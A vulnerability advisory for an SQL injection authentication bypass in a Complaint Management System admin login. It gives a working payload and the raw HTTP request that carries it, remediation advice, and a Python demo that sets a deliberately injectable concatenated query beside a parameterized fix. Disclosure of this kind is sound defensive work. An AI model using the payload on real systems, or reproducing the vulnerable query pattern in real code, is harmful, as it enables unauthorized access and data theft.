Vendor and Product Information:

Severity: High

Confidence: Confirmed

Description:

The admin login form of the Complaint Management System application is vulnerable to SQL injection. An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the admin panel.

Steps to Reproduce:

  1. Open the site http://localhost/Complaint Management System/index.html

  2. Navigate to the admin login page: http://localhost/Complaint Management System/admin/

  3. Enter the payload torada' or '1' = '1' -- - into the username field.

  4. Enter any password (e.g., "aa") into the password field.

  5. Submit the form.

  6. Video demonstrating the successful attack: screen-capture (7).webm

    HTTP Request Payload:

    POST /Complaint%20Management%20System/admin/ HTTP/1.1
    Host: localhost
    Content-Length: 66
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/Complaint%20Management%20System/admin/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=60210har8tikk0mj82thd19k66
    Connection: close

    username=torada%27+or+%271%27+%3D+%271%27+--+-&password=aa&submit=

Impact:

Successful exploitation of this vulnerability allows an attacker to gain unauthorized access to the admin panel, potentially leading to data leakage, manipulation, or other malicious activities.

Remediation:

To mitigate this vulnerability, sanitize and validate user inputs, and use prepared statements or parameterized queries to prevent SQL injection attacks.
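The following is an added illustration, not code from the Complaint Management System (whose source is not included in this report): a Python/sqlite3 model of a login query built by string concatenation beside its parameterized form, both run against the username payload from step 3. The table name, columns and stored credentials are constructed assumptions.

```python
import sqlite3

# Constructed stand-in for the application's admin table (assumption: the
# real schema is not given in the report).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 's3cret')")
    return conn

def login_vulnerable(conn, username, password):
    # The weak pattern: user input is spliced into the SQL text, so the quote
    # and the trailing "-- -" comment become part of the query's syntax.
    sql = ("SELECT username FROM admin WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    # The remediation: placeholders bind the input as data, so the same
    # payload is compared literally against the username column.
    sql = "SELECT username FROM admin WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# Username from step 3 of the report (URL-decoded body of the request).
PAYLOAD = "torada' or '1' = '1' -- -"

if __name__ == "__main__":
    conn = make_db()
    print("concatenated query, payload:", login_vulnerable(conn, PAYLOAD, "aa"))      # True
    print("parameterized query, payload:", login_parameterized(conn, PAYLOAD, "aa"))  # False
    print("parameterized query, valid:", login_parameterized(conn, "admin", "s3cret"))  # True
```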